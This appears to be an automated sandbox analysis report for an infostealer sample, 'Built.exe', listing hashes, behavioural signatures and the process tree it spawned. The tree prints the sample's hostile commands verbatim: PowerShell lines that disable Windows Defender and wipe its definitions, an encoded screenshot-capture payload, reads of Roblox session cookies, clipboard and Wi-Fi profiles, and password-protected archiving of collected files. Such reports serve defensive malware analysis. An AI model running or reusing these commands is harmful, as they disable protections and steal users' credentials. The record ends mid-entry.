Analysis

  • max time kernel
    127s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240611-fr
  • resource tags

    arch:x64arch:x86image:win10v2004-20240611-frlocale:fr-fros:windows10-2004-x64systemwindows
  • submitted
    26-06-2024 13:10

General

  • Target

    Built.exe

  • Size

    224.0MB

  • MD5

    f3c0061c28b07f1ccada3dca9755b304

  • SHA1

    dd41b3edb8abf9a0147695b7dd7f285f8d5aef1e

  • SHA256

    77e67941a20d70449b0a5ba735a279f1d81429d9ea08181591cf910f69b04b71

  • SHA512

    1e804d2a9e5cac5c65ee93b0c30f36916f928e8e17aa339e5db7778725bcc42ba4318f28d30eca15bc8671eea6289602e92ccd9a45b6f4f86f8d05b9e56a5707

  • SSDEEP

    196608:HJq+sxft1urErvI9pWjgU1DEzx7sKLus1tPAkjUWlRHK0:0Xxft1urEUWjhEhnx1tl9K0

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Drops file in Drivers directory 3 IoCs
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 17 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • UPX packed file 57 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • Detects videocard installed 1 TTPs 3 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Enumerates processes with tasklist 1 TTPs 5 IoCs
  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Suspicious behavior: EnumeratesProcesses 23 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Built.exe
    "C:\Users\Admin\AppData\Local\Temp\Built.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2844
    • C:\Users\Admin\AppData\Local\Temp\Built.exe
      "C:\Users\Admin\AppData\Local\Temp\Built.exe"
      2⤵
      • Drops file in Drivers directory
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:2440
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2916
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2268
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3352
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3436
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4176
        • C:\Windows\system32\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:1248
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2940
        • C:\Windows\System32\Wbem\WMIC.exe
          wmic csproduct get uuid
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:2904
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4860
        • C:\Windows\system32\reg.exe
          REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
          4⤵
            PID:2888
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:3856
          • C:\Windows\system32\reg.exe
            REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
            4⤵
              PID:1288
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:2084
            • C:\Windows\System32\Wbem\WMIC.exe
              wmic path win32_VideoController get name
              4⤵
              • Detects videocard installed
              • Suspicious use of AdjustPrivilegeToken
              PID:5060
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:3616
            • C:\Windows\System32\Wbem\WMIC.exe
              wmic path win32_VideoController get name
              4⤵
              • Detects videocard installed
              PID:4664
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\    ‍.scr'"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:4348
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\    ‍.scr'
              4⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:4188
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:3004
            • C:\Windows\system32\tasklist.exe
              tasklist /FO LIST
              4⤵
              • Enumerates processes with tasklist
              PID:844
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:4196
            • C:\Windows\system32\tasklist.exe
              tasklist /FO LIST
              4⤵
              • Enumerates processes with tasklist
              PID:1868
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
            3⤵
              PID:3924
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                4⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                PID:444
                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                  "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\v54d5zlo\v54d5zlo.cmdline"
                  5⤵
                    PID:1856
                    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES55C1.tmp" "c:\Users\Admin\AppData\Local\Temp\v54d5zlo\CSCBDB55F8A6D445A0862CCE2F3F1F32A.TMP"
                      6⤵
                        PID:3904
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
                  3⤵
                    PID:3584
                    • C:\Windows\System32\Wbem\WMIC.exe
                      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
                      4⤵
                        PID:3712
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
                      3⤵
                        PID:4064
                        • C:\Windows\system32\reg.exe
                          REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
                          4⤵
                            PID:3252
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /c "systeminfo"
                          3⤵
                            PID:3760
                            • C:\Windows\system32\systeminfo.exe
                              systeminfo
                              4⤵
                              • Gathers system information
                              PID:3148
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
                            3⤵
                            • Suspicious use of WriteProcessMemory
                            PID:1932
                            • C:\Windows\system32\netsh.exe
                              netsh wlan show profile
                              4⤵
                              • Event Triggered Execution: Netsh Helper DLL
                              PID:932
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /c "tree /A /F"
                            3⤵
                              PID:2580
                              • C:\Windows\system32\tree.com
                                tree /A /F
                                4⤵
                                  PID:5048
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                3⤵
                                  PID:3336
                                  • C:\Windows\system32\tasklist.exe
                                    tasklist /FO LIST
                                    4⤵
                                    • Enumerates processes with tasklist
                                    PID:3304
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
                                  3⤵
                                    PID:4852
                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      powershell Get-Clipboard
                                      4⤵
                                      • Suspicious behavior: EnumeratesProcesses
                                      PID:1944
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /c "tree /A /F"
                                    3⤵
                                      PID:4416
                                      • C:\Windows\system32\tree.com
                                        tree /A /F
                                        4⤵
                                          PID:1368
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
                                        3⤵
                                          PID:1036
                                          • C:\Windows\system32\attrib.exe
                                            attrib -r C:\Windows\System32\drivers\etc\hosts
                                            4⤵
                                            • Drops file in Drivers directory
                                            • Views/modifies file attributes
                                            PID:5064
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
                                          3⤵
                                            PID:1768
                                            • C:\Windows\system32\attrib.exe
                                              attrib +r C:\Windows\System32\drivers\etc\hosts
                                              4⤵
                                              • Drops file in Drivers directory
                                              • Views/modifies file attributes
                                              PID:3436
                                          • C:\Windows\system32\cmd.exe
                                            C:\Windows\system32\cmd.exe /c "tree /A /F"
                                            3⤵
                                              PID:620
                                              • C:\Windows\system32\tree.com
                                                tree /A /F
                                                4⤵
                                                  PID:788
                                              • C:\Windows\system32\cmd.exe
                                                C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                3⤵
                                                  PID:1920
                                                  • C:\Windows\system32\tasklist.exe
                                                    tasklist /FO LIST
                                                    4⤵
                                                    • Enumerates processes with tasklist
                                                    PID:3516
                                                • C:\Windows\system32\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                  3⤵
                                                    PID:2396
                                                    • C:\Windows\system32\tree.com
                                                      tree /A /F
                                                      4⤵
                                                        PID:4024
                                                    • C:\Windows\system32\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                      3⤵
                                                        PID:5052
                                                        • C:\Windows\system32\tree.com
                                                          tree /A /F
                                                          4⤵
                                                            PID:4064
                                                        • C:\Windows\system32\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                          3⤵
                                                            PID:1712
                                                            • C:\Windows\system32\tree.com
                                                              tree /A /F
                                                              4⤵
                                                                PID:1212
                                                            • C:\Windows\system32\cmd.exe
                                                              C:\Windows\system32\cmd.exe /c "getmac"
                                                              3⤵
                                                                PID:3432
                                                                • C:\Windows\system32\getmac.exe
                                                                  getmac
                                                                  4⤵
                                                                    PID:4940
                                                                • C:\Windows\system32\cmd.exe
                                                                  C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                                  3⤵
                                                                    PID:3904
                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                      4⤵
                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                      PID:2420
                                                                  • C:\Windows\system32\cmd.exe
                                                                    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                                    3⤵
                                                                      PID:3844
                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                        4⤵
                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                        PID:4432
                                                                    • C:\Windows\system32\cmd.exe
                                                                      C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI28442\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\iy0Fp.zip" *"
                                                                      3⤵
                                                                        PID:4764
                                                                        • C:\Users\Admin\AppData\Local\Temp\_MEI28442\rar.exe
                                                                          C:\Users\Admin\AppData\Local\Temp\_MEI28442\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\iy0Fp.zip" *
                                                                          4⤵
                                                                          • Executes dropped EXE
                                                                          PID:4232
                                                                      • C:\Windows\system32\cmd.exe
                                                                        C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                                                        3⤵
                                                                          PID:2140
                                                                          • C:\Windows\System32\Wbem\WMIC.exe
                                                                            wmic os get Caption
                                                                            4⤵
                                                                              PID:1868
                                                                          • C:\Windows\system32\cmd.exe
                                                                            C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
                                                                            3⤵
                                                                              PID:1032
                                                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                                                wmic computersystem get totalphysicalmemory
                                                                                4⤵
                                                                                  PID:2928
                                                                              • C:\Windows\system32\cmd.exe
                                                                                C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                                                3⤵
                                                                                  PID:4684
                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    4⤵
                                                                                      PID:3516
                                                                                    • C:\Windows\System32\Wbem\WMIC.exe
                                                                                      wmic csproduct get uuid
                                                                                      4⤵
                                                                                        PID:4368
                                                                                    • C:\Windows\system32\cmd.exe
                                                                                      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
                                                                                      3⤵
                                                                                        PID:3668
                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
